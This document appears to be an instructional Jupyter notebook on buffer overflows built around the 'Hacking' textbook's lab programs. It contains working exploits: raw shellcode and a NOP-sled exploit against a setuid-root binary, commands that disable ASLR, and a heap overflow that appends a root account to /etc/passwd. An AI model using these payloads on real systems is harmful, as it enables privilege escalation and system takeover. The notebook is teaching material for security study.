# Buffer Overflows
## NOTE: Use X86 system to exploit overflow!
- x64 system hasn't been very kind to me!

- most Internet worms use buffer overflow vulnerabilities to propagate
- C and C++ assume that programmers are responsible for data integrity
- modern compilers and OSes provide various protections making it harder to exploit traditional buffer overflows
- once the buffer is allocated, there's no built-in mechanism to safeguard the amount of data that can be stored into to
    - this is called buffer overrun or buffer overflow
    - user data may overwrite other part of the memory it's not supposed to making the program behave differently or crashing the program
    - hackers could take advantage of this flaw to control the program and may pawn the system by executing shellcode or payload of their choice
- buffer overflow can violate all three core principles of **CIA** triad - **Confidentiality, Integrity, and Availability**
- **Confidentiality**: allows attackers to read confidential or data that they're not supposed to have access to
- **Integrity**: allows attackers to modify part of the data/program that they're not supposed to
- **Availability**: allows attackes to crash the system (SEGFAULT) violating availbility of the service

- typically two types:
    1. stack overflow
    2. heap overflow

## Disable ASLR and other compiler protections
- compile.sh script disables compiler protections

In [ ]:
# if value is 0; ASLR is disabled
! cat /proc/sys/kernel/randomize_va_space

In [ ]:
# run this on terminal
# can't interactively type sudo password!
! echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

## Stack Overflow
- overrun in stack segment
- let's use some programs to demonstrate stackoverflow

## Some consequences of stack overflow

1. overwrite variable(s) with the data of your choice (Integrity)
- change the flow of the program (Integrity)
- remote code execution (Integrity, Confidentiality, Availability)

### 1. overwrite variables with the data of your choice
- demo program: booksrc/overflow_example.c

In [ ]:
# let's looks at the content of overlfow_example.c
! cat booksrc/overflow_example.c

### draw stack of main to answer the following questions
- what is the order of the variables pushed?
- when argv[1] is copied to buffer_two, what may happen to other variables?
- compile and run the program with some arguments

In [ ]:
! ./compile.sh booksrc/overflow_example.c overflow_example.exe

In [ ]:
! ./overflow_example.exe
# segfault is bad!! provide some argument

In [ ]:
# run the program providing some argument
! ./overflow_example.exe hello

In [ ]:
# try a few some other values like 15 As and observe!
! ./overflow_example.exe $(perl -e 'print "A"x15')

In [ ]:
# try 16As and notice the int value variable
! ./overflow_example.exe $(perl -e 'print "A"x16 . "BCDE"')

- try to overwrite int value variable with "BCDE"
- how may bytes is value away from buffer_two?
- find the difference between the address of value and buffer_two

In [ ]:
# subtract the address of buffer_two from the address of value
# which variable is at higher location?
! echo $((0xffffd19c - 0xffffd18c))

In [ ]:
# now try overwriting value with BCDE
! ./overflow_example.exe $(perl -e 'print "A"x16 . "BCDE"')
# check if BCDE is in that order...
# remember x86 is little-endian, i.e., smaller byte is stored first

In [ ]:
# check the hex values with python; also see the values of buffer_two and buffer_one
chr(int('42', 16))
# B is stored at the end!

In [ ]:
# try one more time; using hex values of EDCB
! ./overflow_example.exe $(perl -e 'print "A"x16 . "\x45\x44\x43\x42"')

### 2. change the flow of the program
#### e.g. authenticate without using actual password
- use ./booksrc/auth_overflow.c program as demo
- let's see the contents fo auth

In [ ]:
! cat ./booksrc/auth_overflow.c

In [ ]:
# let's compile booksrc/auth_overflow.c
! ./compile.sh ./booksrc/auth_overflow.c auth_overflow.exe

In [ ]:
# run the program; gives help
! ./auth_overflow.exe

In [ ]:
# authenticate with password, outgrabe
! ./auth_overflow.exe outgrabe

In [ ]:
# authenticate with password, brillig
! ./auth_overflow.exe brillig

In [ ]:
# anyother password shouldn't work!
! ./auth_overflow.exe letmein

### let's authenticate without real password

In [ ]:
# Let's provide 16 As as password
! ./auth_overflow.exe $(perl -e 'print "A"x16')

In [ ]:
# how about 17 As
! ./auth_overflow.exe $(perl -e 'print "A"x17')

### draw stack of check_authentication( ) to understand why 17As let's you in

### examine stack using gdb-peda
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context

```bash
$ ./gdb -q auth_overflow.exe
$ break check_authentication
$ run $(perl -e 'print "A"x20')
$ next i
$ x/s password_buffer
$ x/x &auth_flag
$ p/a &password_buffer
$ p/d auth_flag
```

##### can you overflow if the variable declaration orders are switched?
- compile and examine booksrc/auth_overflow2.c
- draw stack
- verify it using GDB

In [ ]:
# let's see the source code of booksrc/auth_overflow2.c
! cat ./booksrc/auth_overflow2.c

In [ ]:
# let's compile the program
! ./compile_bash.sh booksrc/auth_overflow2.c auth_overflow2.exe

In [ ]:
# run the program with 17As
! ./auth_overflow2.exe $(perl -e 'print "A"x17')

### well, how is it possible?
- see in gdb where auth_flag is compared to password_buffer
- turns out auth_flag is still at higher address (pushed before) compared to password_buffer
- compile optimization? (I don't have clear answer to why!)
- if auth_flag is in lower address compared to password_buffer, you can't overwrite it by oveflowing password_buffer
- see Hacking textbook

### control return to the right block to authenticate  
- overflow the return address to bypass check_authentication() condition in main and directly execute the true block
- possible in older gcc/assembly version (Hacking LiveCD)
- couldn't get it to work on newer system (tested on Kali (4-19-0)!
- let's assemble and look at the return instruction...
- repeated instructions add esp, 0x10 and sub esp, 0xc makes it hard to jump into the righ instruction

### can return to printf("    access granted     ")
- find the address add esp, 0x10 before the addres to "access granted"
- use that address to overwrite the return address with
- find the offset from password_buffer to return address (32 bytes)
    - subtract the the address of password_buffer from the address of return address
    - or use gdb peda
    
```bash
- $pattern arg 100 # create a pattern of 100 and set as the argument
- $run the program until segfault
- $patts # see EIP offset which is the return address

```

## 3. Remote code execution
- inject and execute shellcode
- shellcode is a program that gives you shell on the system
- we'll use a vulnerable program booksrc/stackoverflowdemo.c

In [ ]:
# let's look at the source of stackoverflowdemo.c
# program simply copies and echoes user provided argument
! cat booksrc/stackoverflowdemo.c

In [ ]:
# let's compile and execute the program
! ./compile.sh booksrc/stackoverflowdemo.c stackoverflowdemo.exe

In [ ]:
! ./stackoverflowdemo.exe $(perl -e 'print "A"x100')

### exploit stackoverflow vulnerability
#### code execution
- create an exploit code
- exploit code typically has the following structure:
```
repeated nop sled | exploit code | repeated return address
```
- **nop sled**: \x90 no operation instruction
- **exploit code**: shell code, local or remote, tcp connect, reverse connect
- **repeated return address** - address pointing to some address of repeated nop sled  where it is stored in buffer
- provide the exploit code to the vulnerable program as an argument
- for now simply use provided exploit code; later learn how to generate your own exploit code
- the exploit code is in booksrc/exploit_stackoverflow.py

In [71]:
#  let's look at the exploit code written in Python 2
! cat booksrc/exploit_stackoverflow.py

#!/usr/bin/env python2
#
# Template for local argv exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time

def usage():
    print "Usage: %s target_program" % sys.argv[0]
    return

def pattern(size=1024, start=0):
    try:
        bytes = open("pattern.txt").read(size+start)
        return bytes[start:]
    except:
        return "A"*size

def nops(size=1024):
    return "\x90"*size

def int2hexstr(num, intsize=4):
    if intsize == 8:
        if num < 0:
            result = struct.pack("<q", num)
        else:
            result = struct.pack("<Q", num)
    else:
        if num < 0:
            result = struct.pack("<l", num)
        else:
            result = struct.pack("<L", num)
    return result

i2hs = int2hexstr

def list2hexstr(intlist, intsize=4):
    result = ""
    for value in intlist:
        if isinstance(value, str):
            result += value
        else:
            result += int2hexstr(value, intsize)
    return result



### getting the controlled return address
- before you execute the exploit code; you must know the return address where the exploit code will be loaded
- first find the offset (EIP+0) of actual return address from the buffer to be overrun
- two ways:
    1. use gdb
        - length of the argument = return address - buffer address + 4
    2. use peda pattern search technique as described below

### how was the exploit_stackoverflow.py generated?

### using GDB-PEDA
- create pattern and use as an agrument to the program
- crash the vulnerable program and run pattern search or patts to find offset of return address
    - gdb -q ./stackoverflowdemo.exe
    - pattern arg 200
    - run 
    - after program crashes run
    - patts or pattern search
    - look for EIP.and note the EIP offset or EBP+0
        - ..found at offset [#] that's the total offset  where return address (including retrun address) is from the overflown buffer's base address 
        
- generate skeleton exploit code using GDB-PEDA
    - skeleton argv exploit_stackoverflow.py
- create local linux shellcode 
    - shellcode generate x86/linux exec

## Using bash to exploit stackoverflowdemo.exe
- create payload buffer with shellcode
    - 48 bytes nop sleds + shellcode (24 bytes) + return address (4 bytes)
- run program with the payload
    - `$ ./stackoverflowdemo.exe $(cat payloadFile)`

In [72]:
%%bash
# Create payload buffer with exploit code
payloadFile=stackoverflowpayload.bin
perl -e 'print "\x90"x48' > $payloadFile
cat ./booksrc/shellcodex86linuxexec >> $payloadFile
perl -e 'print "\x60\xf1\xff\xbf"' >> $payloadFile
# check the size of the file
echo "$payloadFile Size in bytes"
wc -c $payloadFile

stackoverflowpayload.bin Size in bytes
76 stackoverflowpayload.bin


### booksrc/notesearch.c has stackoverflow vulnerability
- let's look at the source of booksrc/notesearch.c

In [73]:
! cat booksrc/notesearch.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

#define FILENAME "/var/notes"

int print_notes(int, int, char *);   // note printing function
int find_user_note(int, int);        // seek in file for a note for user
int search_note(char *, char *);     // search for keyword function
void fatal(char *);                  // fatal error handler

int main(int argc, char *argv[]) {
	int userid, printing=1, fd; // file descriptor
	char searchstring[100];

	if(argc > 1)                        // If there is an arg
		strcpy(searchstring, argv[1]);   //   that is the search string
	else                                // otherwise
		searchstring[0] = 0;             //   search string is empty

	userid = getuid();
	fd = open(FILENAME, O_RDONLY);   // open the file for read-only access
	if(fd == -1)
		fatal("in main() while opening file for reading");

	while(printing)
		printing = print_notes(fd, userid, searchstring);
	printf("-------[ end of 

In [74]:
# lets compile notesearch.c to a binary
! ./compile.sh booksrc/notesearch.c notesearch.exe

booksrc/notesearch.c: In function ‘main’:
booksrc/notesearch.c:23:11: warning: implicit declaration of function ‘getuid’ [-Wimplicit-function-declaration]
   23 |  userid = getuid();
      |           ^~~~~~
booksrc/notesearch.c:31:2: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
   31 |  close(fd);
      |  ^~~~~
      |  pclose
booksrc/notesearch.c: In function ‘print_notes’:
booksrc/notesearch.c:45:2: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
   45 |  read(fd, note_buffer, note_length); // read note data
      |  ^~~~
      |  fread
booksrc/notesearch.c: In function ‘find_user_note’:
booksrc/notesearch.c:74:2: warning: implicit declaration of function ‘lseek’; did you mean ‘fseek’? [-Wimplicit-function-declaration]
   74 |  lseek(fd, length * -1, SEEK_CUR); // rewind file reading by length bytes
      |  ^~~~~
      |  fseek


#### notesearch program finds note from /var/notes priviledged folder
- change ownership to root and setuid

```bash
$ sudo chown root:root notesearch.exe
$ sudo chmod +s notesearch.exe
```

In [75]:
# let's see the detail of notesearch.exe
! ls -al notesearch.exe

-rwsr-sr-x 1 root root 19928 Apr 27 13:42 notesearch.exe


In [ ]:
! ./notesearch.exe $(perl -e 'print "A"x60')

### notesearch exploit
- booksrc has provide exploit code written in C
- shellcode is modified to work on modern x86 kernel
- let's compile and run the exploit code in terminal

In [77]:
# let's look at the exploit code
! cat booksrc/exploit_notesearch.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=224;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch.exe \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}



In [76]:
# let's compile the exploit code
# if you know the exact offset; modify the value of offset and compile
# if not don't worry about it, you can try and guess!
! ./compile.sh booksrc/exploit_notesearch.c exploit_notesearch.exe

#### run the exploit
- run the exploit_notesearch.exe from the terminal
- use wrapper bash script booksrc/exploit_notesearch.sh to try different offset

```bash
$ ./exploit_notesearch.exe
$ bash exploit_notesearch.sh
```
- change the range if you still do not get the shell

## Heap Overflow
- buffer overflow can happen in other segments such as **heap**, **data** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
- not standarized as stack overflow but can be just as effective

### booksrc/notetaker.c is susceptible to heap overflow
```strcpy(buffer, argv[1]); // problem!
```

In [78]:
! cat booksrc/notetaker.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // a function for fatal errors
void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper

int main(int argc, char *argv[]) {
   int userid, fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't commandline arguments
      usage(argv[0], datafile); // display usage message and exit

   strcpy(buffer, argv[1]);  // copy into buffer

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);


In [79]:
# let's compile notetaker.c
! ./compile.sh ./booksrc/notetaker.c notetaker.exe

./booksrc/notetaker.c: In function ‘main’:
./booksrc/notetaker.c:38:13: warning: implicit declaration of function ‘getuid’ [-Wimplicit-function-declaration]
   38 |    userid = getuid(); // get the real user ID
      |             ^~~~~~
./booksrc/notetaker.c:41:7: warning: implicit declaration of function ‘write’; did you mean ‘fwrite’? [-Wimplicit-function-declaration]
   41 |    if(write(fd, &userid, 4) == -1) // write user ID before note data
      |       ^~~~~
      |       fwrite
./booksrc/notetaker.c:50:7: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
   50 |    if(close(fd) == -1)
      |       ^~~~~
      |       pclose


### notetaker.exe must be setuid root program 
- all users in the system can take their own notes by writing to /var/notes file

```bash
$ sudo chown root:root notetaker.exe
$ sudo chmod u+s notetaker.exe
```

In [80]:
%%bash
ls -al ./notetaker.exe

-rwsr-sr-x 1 root root 19248 Apr 29 13:14 ./notetaker.exe


In [81]:
%%bash
./notetaker.exe "new note for user"

[DEBUG] buffer   @ 0x804d1a0: 'new note for user'
[DEBUG] datafile @ 0x804d210: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.


## overflowing buffer by corrupting datafile
- how far down is datafile from buffer (the offset)
- see source code and try to guess
- use gdb; subtract the address of buffer from the address of datafile

In [84]:
%%bash
./notetaker.exe $(perl -e 'print "A"x112')
# make datafile empty!

[DEBUG] buffer   @ 0x804d1a0: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804d210: ''


[!!] Fatal Error in main() while opening file: No such file or directory


CalledProcessError: Command 'b'./notetaker.exe $(perl -e \'print "A"x112\')\n# make datafile empty!\n'' returned non-zero exit status 255.

In [88]:
# let's make sure testfile doesn't exist in the current director
! ls -al testfile

-rw------- 1 root root 126 Apr 29 13:25 testfile


In [85]:
%%bash
# let's create testfile and write the data sent as an argument
./notetaker.exe $(perl -e 'print "A"x112 . "testfile"')

double free or corruption (out)
bash: line 2:  4315 Aborted                 ./notetaker.exe $(perl -e 'print "A"x112 . "testfile"')


CalledProcessError: Command 'b'# let\'s create testfile and write the data sent as an argument\n./notetaker.exe $(perl -e \'print "A"x112 . "testfile"\')\n'' returned non-zero exit status 134.

In [86]:
%%bash
ls -al testfile

-rw------- 1 root root 126 Apr 29 13:25 testfile


In [87]:
%%bash
cat testfile

cat: testfile: Permission denied


CalledProcessError: Command 'b'cat testfile\n'' returned non-zero exit status 1.

## Exploit the heap-overflow flaw in notetaker program
- several clever ways to exploit this type of capability
- append a user to the /etc/passwd file?
- make a backup copy of the file just incase...

In [89]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [90]:
%%bash
cat /tmp/passwd.bkup

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/u

## /etc/passwd file format

username:password:userid:groupid:User Info:home folder:default shell
- x : hashed password stored in /etc/shadow file
- the password field can contain hashed password
- Perl crypt() function uses same function used by system to hash password

In [91]:
%%bash
perl -e 'print crypt("password", "AA")'

AA6tQYSfGxd/A

In [92]:
%%bash
perl -e 'print crypt("password", "XX")'

XXq2wKiyI43A2

## goal: genarate a entry that looks like

`letmein:XXq2wKiyI43A2:0:0:me:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with /bin/bash
    - the file name /etc/passwd will be automatically attached at the end

### workaround:
- make /etc/passwd a soft link pointing to /bin/bash

In [94]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [95]:
%%bash
ls -l /tmp/etc/passwd

lrwxrwxrwx 1 user user 9 Apr 29 13:38 /tmp/etc/passwd -> /bin/bash


### now we've a valid password entry that looks like:

`letmein:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### one more thing:
- the value just before /etc/passwd must be 112 bytes long, remember?
- can play with user information column to adjust the length


In [96]:
%%bash
# find the length with empty user info
echo -ne letmein:XXq2wKiyI43A2:0:0::/root:/tmp | wc -c

37


In [97]:
%%bash
echo $((112-37))

75


In [98]:
%%bash
perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp"' | wc -c

112


In [99]:
%%bash
./notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')

munmap_chunk(): invalid pointer
bash: line 1:  4615 Aborted                 ./notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')


CalledProcessError: Command 'b'./notetaker.exe $(perl -e \'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"\')\n'' returned non-zero exit status 134.

In [100]:
%%bash
tail /etc/passwd

colord:x:129:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:130:138::/var/lib/geoclue:/usr/sbin/nologin
king-phisher:x:131:139::/var/lib/king-phisher:/usr/sbin/nologin
Debian-gdm:x:132:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user,12,,:/home/user:/bin/bash
tom:x:1001:1001:tom,123,456,:/home/tom:/bin/bash
jerry:x:1002:1002:jerry,788,454,:/home/jerry:/bin/bash
�  
letmein:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd


## now login or su letmein with password

## BSS Segment, Function Pointer Overflow
### Game of Chance program
- three different game functions
    - uses a single global function pointer to remember last game played
- uses global struct object in BSS segment to hold plyayer's info
- seteuid multi-user program that stores user's data in /var folder

- compile game_of_chance.c
- change ownership to root:root
- seteuid
- run and play game
- player.name buffer is 100 bytes
- input_name() copies data to player.name until \n
- play_the_game function can take advantage of the overflown function pointer when any game is 
- put the game to background - ctrl+z
- find the difference between player.name address and player.current_game (100)
- return to the suspended program: fg
- enter 5 to change name
- change name to 100As+BBBB+\n
- play the same game and see the DEBUG
- find valid address to overwrite current_game func ptr
- list symbols in object/binary (nm)
    - nm game_of_chance.exe
- automate/simulate the game play
- $ perl -e 'print "1\n10\nn\n5\n" . "A"x100 . "jackpot address in rev order" . "1\n" . "y\n"x10 . 
"n\n5\nJohn Doe\n7"' | ./game_of_chance